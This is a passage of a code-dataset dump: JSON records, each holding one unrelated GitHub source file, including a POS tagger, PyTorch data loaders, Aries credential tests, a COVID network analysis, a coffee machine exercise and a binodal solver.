{resources[0]} died. Stopping and exiting\")\n if len(resources) == 2 and secProc.is_alive():\n secProc.terminate()\n elif len(resources) == 2:\n print(f\"Process for {resources[1]} also died...\")\n raise Exception(\"Loop died\")\n\n if len(resources) == 2 and not secProc.is_alive():\n print(f\"Process for {resources[1]} died. 
Stopping and exiting\")\n if firstProc.is_alive():\n firstProc.terminate()\n else:\n print(f\"Process for {resources[0]} also died...\")\n raise Exception(\"Loop died\")\n\n sleep(5)\n","repo_name":"pieterv-icloud-com/k3s-openfaas","sub_path":"docker/k8s-sidecar/sidecar/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":6346,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"}{"seq_id":"42023506151","text":"\"\"\" constants.py\nConstant variables used during the program\n\"\"\"\n\nSTART_DELAY=5\nFORCE_PLAY_DELAY=10\n\nSPECIAL_CARDS={14:'Ace',11:'Jack',12:'Queen',13:'King'}\n\nROYAL_HANDS=[\"Royal Flush\",\"Straight Flush\",\"Four of a Kind\",\"Full House\"]\n\nBODY_TRAITS=[\"hair\",\"eyes\",\"mouth\",\"nose\",\"ears\",\"face\",\"chest\",\"arms\",\n \"hands\",\"waist\",\"hips\",\"ass\",\"groin\",\"legs\",\"feet\",\"phys_trait1\",\n \"phys_trait2\",\"phys_trait3\",\"age\",\"ethnicity\"]\n\nPERSONALITY_TRAITS=[\"pers_trait1\",\"pers_trait2\",\"pers_trait3\"]\n\nSKILL_TRAITS=[\"skill1\",\"skill2\",\"skill3\"]\n\nMENTAL_TRAITS=[\"gender\",\"sexuality\"]+PERSONALITY_TRAITS+SKILL_TRAITS\n\nMODIFIABLE_TRAITS=[\"clothing\",\"relationships\"]\n\nOTHER_TRAITS=[\"name\",\"other1\",\"other2\"]\n\nALL_TRAITS=BODY_TRAITS+MENTAL_TRAITS+MODIFIABLE_TRAITS+OTHER_TRAITS\n\nCH_ORDER_TRAITS=[\"phys_trait1\",\"phys_trait2\",\"phys_trait3\",\n \"pers_trait1\",\"pers_trait2\",\"pers_trait3\",\"skill1\",\"skill2\",\n \"skill3\",\"other1\",\"other2\"]","repo_name":"Catticon25/poker_swap_bot","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"71564481059","text":"import argparse\nfrom naive import NaiveTagger\nfrom viterbi import ViterbiTagger\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(description='Parts-of-speech tagger')\n argparser.add_argument(\"-a\", \"--algorithm\", choices=[\"viterbi\", \"naive\"], help=\"Tagging algorithm\", default=\"viterbi\")\n arg_group = argparser.add_mutually_exclusive_group()\n arg_group.add_argument(\"-s\", \"--sentence\", help=\"Tag a sentence\")\n arg_group.add_argument(\"-i\", \"--input_file\", help=\"Input file\")\n arg_group.add_argument(\"-t\", \"--train_file\", help=\"Training file\")\n args = argparser.parse_args()\n\n if args.algorithm == \"viterbi\":\n tagger = ViterbiTagger()\n elif args.algorithm == \"naive\":\n tagger = NaiveTagger()\n\n if args.input_file:\n tagger.tag_file(args.input_file)\n elif args.sentence:\n print(tagger.tag_sentence(args.sentence))\n elif args.train_file:\n tagger.train(args.train_file)\n else:\n argparser.print_help()\n\n# python3 pos.py --train_file\n\n# test with `evalb -p collins.prm gold.gld test.tst`\n# test with `evalb -p collins.prm sentences23.gold sentences23.tst`\n# tgrep:\n\n# to generate a binary\n# tgrep2 -p bank0.top bank0tgrep\n\n# to search for TOP\n# tgrep2 -c bank0tgrep -l TOP | less\n\n# to search for VP, VPN etc (regex support)\n# tgrep2 -c bank0tgrep -l /VP/ | less\n# tgrep2 -c bank0tgrep -l /^VP/ | less\n# tgrep2 -c bank0tgrep -l /^VP$/ | less\n\n# immediately dominates\n# tgrep2 -c bank0tgrep -l '/^NP$/ < /PP/' | less\n\n# dominates (at any depth)\n# tgrep2 -c bank0tgrep -l '/^NP$/ << /PP/' | 
less\n","repo_name":"FelipeCortez/nlp","sub_path":"pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"18724907833","text":"import torch\nimport os\nimport shutil\nimport multiprocessing\nfrom .hdf5_reader import Hdf5Dataset as Dataset\nfrom .consts import time_stamp\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom numpy import floor\n\ndef get_results_dir(args):\n \n return os.path.join(args.results_dir,args.run_dir)\n\ndef get_dataloaders(args,ss, data_composition_key,model_key,validation=True):\n\n results_dir = get_results_dir(args)\n\n input_filename = f\"train_test_data_{ss}_supervised.hdf5\"\n \n full_input_filename = os.path.join(args.data_dir,input_filename)\n if not os.path.isfile(full_input_filename):\n print(\"dataloader_provider: fn does not exist!\")\n exit(1)\n\n train_ds = Dataset(full_input_filename, \"supervised\",\"train\",data_composition_key,model_key)\n test_ds = Dataset(full_input_filename, \"supervised\",\"test\",data_composition_key, model_key)\n cpu_count = multiprocessing.cpu_count()\n\n test_data_loader = torch.utils.data.DataLoader(test_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False)\n\n if validation:\n validation_split = 0.142857143\n train_ds_size = len(train_ds)\n indices = list(range(train_ds_size))\n split = int(floor(validation_split * train_ds_size))\n\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n train_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False,sampler=train_sampler)\n valid_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False,sampler=valid_sampler)\n\n return train_data_loader, valid_data_loader, test_data_loader\n\n train_data_loader = torch.utils.data.DataLoader(train_ds,num_workers=cpu_count,batch_size=args.batch_size,pin_memory=True,shuffle=False)\n\n return train_data_loader, test_data_loader","repo_name":"skynet1010/dataselector","sub_path":"code/utils/dataloader_provider.py","file_name":"dataloader_provider.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71984960417","text":"import json\n\nfrom asynctest import TestCase as AsyncTestCase\nfrom asynctest import mock as async_mock\n\nfrom indy.error import IndyError, ErrorCode\n\nfrom aries_cloudagent.holder.indy import IndyHolder\nfrom aries_cloudagent.storage.error import StorageError\nfrom aries_cloudagent.storage.record import StorageRecord\nfrom aries_cloudagent.wallet.indy import IndyWallet\n\nimport pytest\n\nfrom ...messaging.issue_credential.v1_0.messages.inner.credential_preview import (\n CredentialPreview\n)\n\n\n@pytest.mark.indy\nclass TestIndyHolder(AsyncTestCase):\n def test_init(self):\n holder = IndyHolder(\"wallet\")\n assert holder.wallet == \"wallet\"\n\n @async_mock.patch(\"indy.anoncreds.prover_create_credential_req\")\n async def test_create_credential_request(self, mock_create_credential_req):\n mock_create_credential_req.return_value = (\"{}\", \"{}\")\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n cred_req = await holder.create_credential_request(\n \"credential_offer\", 
\"credential_definition\", \"did\"\n )\n\n mock_create_credential_req.assert_called_once_with(\n mock_wallet.handle,\n \"did\",\n json.dumps(\"credential_offer\"),\n json.dumps(\"credential_definition\"),\n mock_wallet.master_secret_id,\n )\n\n assert cred_req == ({}, {})\n\n @async_mock.patch(\"indy.anoncreds.prover_store_credential\")\n async def test_store_credential(self, mock_store_cred):\n mock_store_cred.return_value = \"cred_id\"\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n cred_id = await holder.store_credential(\n \"credential_definition\", \"credential_data\", \"credential_request_metadata\"\n )\n\n mock_store_cred.assert_called_once_with(\n mock_wallet.handle,\n None,\n json.dumps(\"credential_request_metadata\"),\n json.dumps(\"credential_data\"),\n json.dumps(\"credential_definition\"),\n None,\n )\n\n assert cred_id == \"cred_id\"\n\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n async def test_get_credential_attrs_mime_types(self, mock_nonsec_get_wallet_record):\n cred_id = \"credential_id\"\n dummy_tags = {\"a\": \"1\", \"b\": \"2\"}\n dummy_rec = {\n \"type\": IndyHolder.RECORD_TYPE_MIME_TYPES,\n \"id\": cred_id,\n \"value\": \"value\",\n \"tags\": dummy_tags\n }\n mock_nonsec_get_wallet_record.return_value = json.dumps(dummy_rec)\n\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n mime_types = await holder.get_mime_type(cred_id)\n\n mock_nonsec_get_wallet_record.assert_called_once_with(\n mock_wallet.handle,\n dummy_rec[\"type\"],\n f\"{IndyHolder.RECORD_TYPE_MIME_TYPES}::{dummy_rec['id']}\",\n json.dumps(\n {\n \"retrieveType\": True,\n \"retrieveValue\": True,\n \"retrieveTags\": True\n }\n )\n )\n\n assert mime_types == dummy_tags\n\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n async def test_get_credential_attr_mime_type(self, mock_nonsec_get_wallet_record):\n cred_id = \"credential_id\"\n dummy_tags = {\"a\": \"1\", \"b\": \"2\"}\n dummy_rec = {\n \"type\": IndyHolder.RECORD_TYPE_MIME_TYPES,\n \"id\": cred_id,\n \"value\": \"value\",\n \"tags\": dummy_tags\n }\n mock_nonsec_get_wallet_record.return_value = json.dumps(dummy_rec)\n\n mock_wallet = async_mock.MagicMock()\n\n holder = IndyHolder(mock_wallet)\n\n a_mime_type = await holder.get_mime_type(cred_id, \"a\")\n\n mock_nonsec_get_wallet_record.assert_called_once_with(\n mock_wallet.handle,\n dummy_rec[\"type\"],\n f\"{IndyHolder.RECORD_TYPE_MIME_TYPES}::{dummy_rec['id']}\",\n json.dumps(\n {\n \"retrieveType\": True,\n \"retrieveValue\": True,\n \"retrieveTags\": True\n }\n )\n )\n\n assert a_mime_type == dummy_tags[\"a\"]\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search\")\n async def test_get_credentials(\n self, mock_close_cred_search, mock_fetch_credentials, mock_search_credentials\n ):\n mock_search_credentials.return_value = (\"search_handle\", \"record_count\")\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials(0, 0, {})\n\n mock_search_credentials.assert_called_once_with(\n mock_wallet.handle, json.dumps({})\n )\n\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_fetch_credentials.assert_called_once_with(\"search_handle\", 0)\n mock_close_cred_search.assert_called_once_with(\"search_handle\")\n\n assert credentials == 
json.loads(\"[1,2,3]\")\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search\")\n async def test_get_credentials_seek(\n self, mock_close_cred_search, mock_fetch_credentials, mock_search_credentials\n ):\n mock_search_credentials.return_value = (\"search_handle\", \"record_count\")\n mock_fetch_credentials.return_value = \"[1,2,3]\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials(2, 3, {})\n\n assert mock_fetch_credentials.call_args_list == [\n ((\"search_handle\", 2),),\n ((\"search_handle\", 3),),\n ]\n\n @async_mock.patch(\"indy.anoncreds.prover_search_credentials_for_proof_req\")\n @async_mock.patch(\"indy.anoncreds.prover_fetch_credentials_for_proof_req\")\n @async_mock.patch(\"indy.anoncreds.prover_close_credentials_search_for_proof_req\")\n async def test_get_credentials_for_presentation_request_by_referent(\n self,\n mock_prover_close_credentials_search_for_proof_req,\n mock_prover_fetch_credentials_for_proof_req,\n mock_prover_search_credentials_for_proof_req,\n ):\n mock_prover_search_credentials_for_proof_req.return_value = \"search_handle\"\n mock_prover_fetch_credentials_for_proof_req.return_value = (\n '[{\"cred_info\": {\"referent\": \"asdb\"}}]'\n )\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credentials = await holder.get_credentials_for_presentation_request_by_referent(\n {\"p\": \"r\"}, (\"asdb\",), 2, 3, {\"e\": \"q\"}\n )\n\n mock_prover_search_credentials_for_proof_req.assert_called_once_with(\n mock_wallet.handle, json.dumps({\"p\": \"r\"}), json.dumps({\"e\": \"q\"})\n )\n\n assert mock_prover_fetch_credentials_for_proof_req.call_args_list == [\n ((\"search_handle\", \"asdb\", 2),),\n ((\"search_handle\", \"asdb\", 3),),\n ]\n\n mock_prover_close_credentials_search_for_proof_req.assert_called_once_with(\n \"search_handle\"\n )\n\n assert credentials == (\n {\"cred_info\": {\"referent\": \"asdb\"}, \"presentation_referents\": [\"asdb\"]},\n )\n\n @async_mock.patch(\"indy.anoncreds.prover_get_credential\")\n async def test_get_credential(self, mock_get_cred):\n mock_get_cred.return_value = \"{}\"\n\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n credential = await holder.get_credential(\"credential_id\")\n\n mock_get_cred.assert_called_once_with(mock_wallet.handle, \"credential_id\")\n\n assert credential == json.loads(\"{}\")\n\n @async_mock.patch(\"indy.anoncreds.prover_delete_credential\")\n @async_mock.patch(\"indy.non_secrets.get_wallet_record\")\n @async_mock.patch(\"indy.non_secrets.delete_wallet_record\")\n async def test_delete_credential(\n self,\n mock_nonsec_del_wallet_record,\n mock_nonsec_get_wallet_record,\n mock_prover_del_cred\n ):\n mock_wallet = async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n mock_nonsec_get_wallet_record.return_value = json.dumps(\n {\n \"type\": \"typ\",\n \"id\": \"ident\",\n \"value\": \"value\",\n \"tags\": {\n \"a\": json.dumps(\"1\"),\n \"b\": json.dumps(\"2\")\n }\n }\n )\n\n credential = await holder.delete_credential(\"credential_id\")\n\n mock_prover_del_cred.assert_called_once_with(\n mock_wallet.handle,\n \"credential_id\"\n )\n\n @async_mock.patch(\"indy.anoncreds.prover_create_proof\")\n async def test_create_presentation(self, mock_create_proof):\n mock_create_proof.return_value = \"{}\"\n\n mock_wallet = 
async_mock.MagicMock()\n holder = IndyHolder(mock_wallet)\n\n presentation = await holder.create_presentation(\n \"presentation_request\",\n \"requested_credentials\",\n \"schemas\",\n \"credential_definitions\",\n )\n\n mock_create_proof.assert_called_once_with(\n mock_wallet.handle,\n json.dumps(\"presentation_request\"),\n json.dumps(\"requested_credentials\"),\n mock_wallet.master_secret_id,\n json.dumps(\"schemas\"),\n json.dumps(\"credential_definitions\"),\n json.dumps({}),\n )\n\n assert presentation == json.loads(\"{}\")\n","repo_name":"OpenMined/PyAriesFL","sub_path":"aries_cloudagent/holder/tests/test_indy.py","file_name":"test_indy.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"34"}{"seq_id":"2965593982","text":"# Created by woochanghwang at 17/07/2021\n\n# Created by woochanghwang at 17/06/2020\n\nimport pandas as pd\nimport toolbox.data_handler as dh\nimport itertools\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom collections import Counter\nimport seaborn as sns\n\n'''\nCalculate all shortest paths between DIP and DEP\nand get the ratio of paths of\nlength 1\nlength 2\nlength 3\n'''\n\ndef remove_DIP_DEP_self_edges(covid_graph, dip_in_graph, dep_in_graph):\n covid_graph_edges = covid_graph.edges()\n\n covid_graph_edges_no_DIP_DEP_self = []\n\n for edge in covid_graph_edges:\n if len(set(edge)&set(dip_in_graph))==2: continue\n elif len(set(edge)&set(dep_in_graph))==2: continue\n else:\n covid_graph_edges_no_DIP_DEP_self.append(edge)\n\n return nx.Graph(covid_graph_edges_no_DIP_DEP_self)\n\ndef find_pair_shortest_path_length(covid_graph, dip_proteins, dep_proteins, virus):\n\n covid_graph_nodes = list(covid_graph.nodes())\n\n dip_in_graph = list(set(dip_proteins)&set(covid_graph_nodes))\n dep_in_graph = list((set(dep_proteins)&set(covid_graph_nodes))-set(dip_in_graph))\n hidden_in_graph = list(set(covid_graph_nodes) - set(dip_in_graph) - set(dep_in_graph))\n\n print(len(dip_in_graph), len(dep_in_graph), len(hidden_in_graph), virus)\n dip_dep_pair_list = list(itertools.product(dip_in_graph, dep_in_graph))\n\n print(len(dip_dep_pair_list))\n # print(dip_dep_pair_list[:5])\n\n print(len(covid_graph.edges()))\n covid_graph = remove_DIP_DEP_self_edges(covid_graph, dip_in_graph, dep_in_graph)\n\n print(len(covid_graph.edges()))\n\n dip_dep_pair_path_length_list = []\n dip_dep_pair_no_path = []\n for pair in dip_dep_pair_list:\n pair = list(pair)\n pair_length = pair[:]\n try:\n length = nx.shortest_path_length(covid_graph,source=pair[0],target=pair[1])\n pair_length.append(length)\n dip_dep_pair_path_length_list.append(pair_length)\n\n except:\n print(pair)\n dip_dep_pair_no_path.append(pair)\n\n dip_dep_pair_path_length_df = pd.DataFrame(dip_dep_pair_path_length_list,columns=['DIP','DEP','Path_length'])\n dip_dep_pair_path_length_addr = f\"../result/{virus}/network/{virus}_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n dip_dep_pair_path_length_df.to_csv(dip_dep_pair_path_length_addr,index=False)\n\n dip_dep_pair_no_path_df = pd.DataFrame(dip_dep_pair_no_path,columns=['DIP','DEP'])\n dip_dep_pair_no_path_df.to_csv(f\"../result/{virus}/network/{virus}_dip_to_dep_no_path.csv\")\n\n ################################################\n\n # dip_dep_pair_path_length_df.plot.hist(grid=True, bins=20, rwidth=0.9,color='#607c8e')\n # dip_dep_pair_path_length_df.plot.hist(grid=True,alpha=0.5, color='#607c8e')\n # plt.title('COVID19 network DIP to DEP path length')\n # plt.xlabel('Length')\n # 
plt.ylabel('DIP,DEP pair')\n # # plt.grid(axis='y', alpha=0.75)\n # plt.show()\n\ndef draw_path_length_histogram():\n dip_dep_pair_path_length_SARS_CoV_addr = \"../result/SARS-CoV/network/SARS-CoV_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n dip_dep_pair_path_length_SARS_CoV_2_addr = \"../result/SARS-CoV-2/network/SARS-CoV-2_dip_to_dep_path_length_no_DIP_DEP_self.csv\"\n\n\n pair_path_length_SARS_CoV_df = pd.read_csv(dip_dep_pair_path_length_SARS_CoV_addr)\n pair_path_length_SARS_CoV_2_df = pd.read_csv(dip_dep_pair_path_length_SARS_CoV_2_addr)\n\n # length_6, pair_numbers_6 = zip(*Counter(pair_path_length_SARS_CoV_df['Path_length'].to_list()).items())\n # length_24, pair_numbers_24 = zip(*Counter(pair_path_length_SARS_CoV_2_df['Path_length'].to_list()).items())\n #\n # print(length_6,pair_numbers_6)\n\n pair_length_SARS_CoV_counter= Counter(pair_path_length_SARS_CoV_df['Path_length'].to_list())\n pair_length_SARS_CoV_2_counter = Counter(pair_path_length_SARS_CoV_2_df['Path_length'].to_list())\n\n pair_length_SARS_CoV_counter_df = pd.DataFrame.from_dict(pair_length_SARS_CoV_counter,orient='index').reset_index()\n pair_length_SARS_CoV_counter_df = pair_length_SARS_CoV_counter_df.rename(columns={'index':'length', 0:'DIP-DEP_pairs'})\n pair_length_SARS_CoV_counter_df['network'] = 'SARS-CoV'\n\n total_pairs = pair_length_SARS_CoV_counter_df['DIP-DEP_pairs'].sum()\n pair_length_SARS_CoV_counter_df['percentage'] = pair_length_SARS_CoV_counter_df['DIP-DEP_pairs']/total_pairs * 100\n\n pair_length_SARS_CoV_2_counter_df = pd.DataFrame.from_dict(pair_length_SARS_CoV_2_counter, orient='index').reset_index()\n pair_length_SARS_CoV_2_counter_df = pair_length_SARS_CoV_2_counter_df.rename(columns={'index': 'length', 0: 'DIP-DEP_pairs'})\n pair_length_SARS_CoV_2_counter_df['network'] = 'SARS-CoV-2'\n total_pairs = pair_length_SARS_CoV_2_counter_df['DIP-DEP_pairs'].sum()\n pair_length_SARS_CoV_2_counter_df['percentage'] = pair_length_SARS_CoV_2_counter_df['DIP-DEP_pairs']/total_pairs * 100\n\n pair_length_counter_df = pd.concat([pair_length_SARS_CoV_counter_df, pair_length_SARS_CoV_2_counter_df])\n # pair_length_counter_df = pair_length_counter_df.sort_values(by='length',ascending=False)\n print(pair_length_counter_df)\n\n ## sns.catplot(x='length',y='DIP-DEP_pairs',hue='network', data=pair_length_counter_df, kind='bar')\n ax = sns.histplot(data=pair_length_counter_df,\n x = 'network',\n weights='percentage',\n hue='length',\n multiple='stack',\n edgecolor='white',\n # palette='tab20c',\n palette = \"Set3\",\n hue_order=[9,8,7,6,5,4,3,2,1],\n shrink=0.8)\n # print(pair_length_SARS_CoV_counter)\n # n,bins,patches = plt.hist([pair_path_length_SARS_CoV_df['Path_length'],pair_path_length_SARS_CoV_2_df['Path_length']])\n # plt.grid()\n ax.set_ylabel('Percentage')\n ax.set_xlabel('Virus')\n legend = ax.get_legend()\n legend.set_bbox_to_anchor((1, 1))\n plt.tight_layout()\n\n # plt.savefig(\"../result/covid19_dip_to_dep_path_barplot_no_DIP_DEP_self.png\")\n # plt.savefig(\"../result/covid19_dip_to_dep_path_stack_barplot_no_DIP_DEP_self.pdf\")\n plt.show()\n # sns.barplot()\n\n\n\ndef main():\n viruses = ['SARS-CoV', 'SARS-CoV-2']\n virus = viruses[1]\n graph_addr = f\"../result/{virus}/network/{virus}_All_Structure_All_Shortest_Paths_Graph\"\n covid_graph = dh.load_obj(graph_addr)\n\n\n dip_proteins = pd.read_csv(f\"../Data/DIP/{virus}_DIP.csv\")['gene_name'].tolist()\n dep_proteins = pd.read_csv(f\"../Data/DEP/{virus}_DEP.csv\")['Gene_name'].tolist()\n\n # find_pair_shortest_path_length(covid_graph, 
dip_proteins, dep_proteins, virus)\n\n draw_path_length_histogram()\n\n\nif __name__ == '__main__':\n main()","repo_name":"wchwang/Method_Pancorona","sub_path":"analyse_SIP_find_shortest_paths_BW_DIP_DEP.py","file_name":"analyse_SIP_find_shortest_paths_BW_DIP_DEP.py","file_ext":"py","file_size_in_byte":6728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"70001851939","text":"from typing import Optional\nfrom typing import Generator\nfrom fastapi import Query\nimport logging\n\nfrom app.api.v1.schemas.pagination_schema import PaginationQuery\n\nfrom app.database.database import SessionLocal\nlog = logging.getLogger(\"uvicorn\")\n\ndef get_db() -> Generator:\n # create the session before the try block so `db` is always bound in\n # the finally clause, and do not silently swallow exceptions raised\n # while the session is in use\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\ndef get_pagination_query(\n page: Optional[int] = Query(1, title=\"page\", ge=1),\n per_page: Optional[int] = Query(30, title=\"items for page\", ge=1, le=9999),\n) -> PaginationQuery:\n return PaginationQuery(page=page, per_page=per_page)\n\n","repo_name":"blasmoyano/remember_to_buy","sub_path":"app/api/v1/depends/depends.py","file_name":"depends.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"39462607452","text":"# Starting data\nMENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"milk\": 0,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nprofit = 0\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n}\n\n# money values\nquarter_value = 0.25\ndimes_value = 0.1\nnickel_value = 0.05\npennies_value = 0.01\n\n\ndef get_report():\n print(f\"Water: {resources['water']}ml\\nMilk: {resources['milk']}ml\\n\"\n f\"Coffee: {resources['coffee']}g\\nMoney: ${profit}\")\n\n\ndef check_resources(coffee):\n water_left = resources['water'] - MENU[coffee]['ingredients']['water']\n milk_left = resources['milk'] - MENU[coffee]['ingredients']['milk']\n coffee_left = resources['coffee'] - MENU[coffee]['ingredients']['coffee']\n\n if water_left < 0:\n return 'water'\n elif milk_left < 0:\n return 'milk'\n elif coffee_left < 0:\n return 'coffee'\n else:\n return False\n\n\ndef deduct_resource(coffee):\n resources['water'] = resources['water'] - MENU[coffee]['ingredients']['water']\n resources['milk'] = resources['milk'] - MENU[coffee]['ingredients']['milk']\n resources['coffee'] = resources['coffee'] - MENU[coffee]['ingredients']['coffee']\n\n\ndef process_coins(coffee):\n print('Please insert coins.')\n quarters = float(input('how many quarters?: '))\n dimes = float(input('how many dimes?: '))\n nickels = float(input('how many nickels?: '))\n pennies = float(input('how many pennies?: '))\n\n money_got = (quarters * quarter_value) + (dimes * dimes_value) + (nickels * nickel_value) + \\\n (pennies * pennies_value)\n\n # only report the change; profit is updated by the caller once the\n # payment is confirmed to be sufficient\n change_left = money_got - MENU[coffee]['cost']\n return round(change_left, 2)\n\n\nwhile True:\n userInput = input(\"What would you like? 
(espresso/latte/cappuccino): \")\n\n if userInput == \"report\":\n get_report()\n elif userInput == \"off\":\n break\n elif userInput == 'espresso' or userInput == 'latte' or userInput == 'cappuccino':\n # check resources\n resource_not_available = check_resources(userInput)\n if resource_not_available:\n print(f\"Sorry there is not enough {resource_not_available}\")\n continue\n else:\n # Process Coins\n change = process_coins(userInput)\n\n # exact payment (change == 0) is also sufficient\n if change >= 0:\n profit += MENU[userInput]['cost']\n deduct_resource(userInput)\n if change > 0:\n print(f\"Here is ${change} in change.\")\n print(\"Thank you for waiting..\")\n print(f\"Here is your special {userInput} ☕. Enjoy!\")\n else:\n print(\"Sorry that's not enough money. Money refunded.\")\n continue\n","repo_name":"NilGamer/Coffee-Machine-Project","sub_path":"myMain.py","file_name":"myMain.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"27678575435","text":"import os\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport cv2\nfrom tqdm import tqdm\nimport imageio\n\nimport res_unet\nfrom SwappedDataset import SwappedDatasetLoader\nimport utils\nimport img_utils\n\nfrom blending import *\n\ndef transfer_mask(img1, img2, mask):\n return img1 * mask + img2 * (1 - mask)\n\ndef Test(G, testLoader, device):\n pbar = tqdm(enumerate(testLoader), total=len(testLoader), leave=False)\n\n with torch.no_grad():\n G.eval()\n for i, images in pbar:\n\n source = images['source'].to(device) #(fg)\n target = images['target'].to(device) #(bg)\n swap = images['swap'].to(device) #(sw)\n mask = images['mask'].to(device) #(mask) \n\n # Overlaid image\n overlaid_image = transfer_mask(swap, target, mask)\n # Feed the network with images from test set\n img_transfer_input = torch.cat((overlaid_image, target, mask), dim=1).to(device)\n\n # Blend images\n pred = G(img_transfer_input)\n\n for b in range(source.shape[0]):\n img = img_utils.tensor2rgb(source[b])\n imageio.imwrite(visuals_loc + '/Epoch_%d_output_%d_%d.png' % (20, i, b), img)\n\n\nif __name__ == '__main__':\n\n cudaDevice = ''\n\n if len(cudaDevice) < 1:\n if torch.cuda.is_available():\n device = torch.device('cuda')\n print('[*] GPU Device selected as default execution device.')\n else:\n device = torch.device('cpu')\n print('[X] WARN: No GPU Devices found on the system! Using the CPU. '\n 'Execution maybe slow!')\n else:\n device = torch.device('cuda:%s' % cudaDevice)\n print('[*] GPU Device %s selected as default execution device.' 
%\n cudaDevice)\n\n G_PATH = 'Exp_BlenderOriginal/checkpoints/checkpoint_G_20.pth'\n\n test_list = 'test.str'\n data_root = './data_set/data_set/'\n batch_size = 8\n testDataset = SwappedDatasetLoader(test_list, data_root)\n testLoader = torch.utils.data.DataLoader(dataset=testDataset, batch_size=batch_size, shuffle=True)\n\n generator = res_unet.MultiScaleResUNet(in_nc=7)\n generator, _, _ = utils.loadModels(generator, path=G_PATH)\n\n generator.to(device)\n\n experiment_name = 'BlenderOriginal'\n visuals_loc = 'Exp_%s/source_imgs/' % experiment_name.replace(' ', '_')\n os.makedirs(visuals_loc, exist_ok=True)\n\n Test(generator, testLoader, device)\n ","repo_name":"irenepap2/CV2_assignments","sub_path":"assignment3/cv2_2022_assignment3/gan_blender_release/test_blender.py","file_name":"test_blender.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"199090336","text":"\"\"\"\nroutines to find binodal point between two phases\n\"\"\"\n\nimport numpy as np\nfrom scipy import optimize\n\ndef get_binodal_point(ref,IDs,muA,muB,\n reweight_kwargs={},\n full_output=False,\n **kwargs):\n \"\"\"\n calculate binodal point where Omega[ID[0]]==Omega[ID[1]]\n\n Parameters\n ----------\n ref : lnPi_phases object\n object to reweight\n\n IDs : (ID0,ID1)\n phaseIDs of pair to equate\n\n muA,muB : mu arrays bracketing solution\n\n reweight_kwargs : dict\n extra arguments to reweight\n \n full_output : bool (Default False)\n if True, return solve stats\n\n **kwargs : extra arguments to scipy.optimize.brentq\n\n Returns\n -------\n binodal : lnPi_phases object at binodal point\n\n stats : solve stats object from brentq (optional, returned if full_output is True)\n \"\"\"\n\n assert len(IDs)==2\n\n muA = np.asarray(muA)\n muB = np.asarray(muB)\n \n \n msk = muA != muB\n if msk.sum()!=1:\n raise ValueError('only one value can vary between muA and muB')\n\n mu_idx = np.where(msk)[0][0]\n mu_in = muA.copy()\n\n a,b = sorted([x[mu_idx] for x in [muA,muB]])\n \n reweight_kwargs = 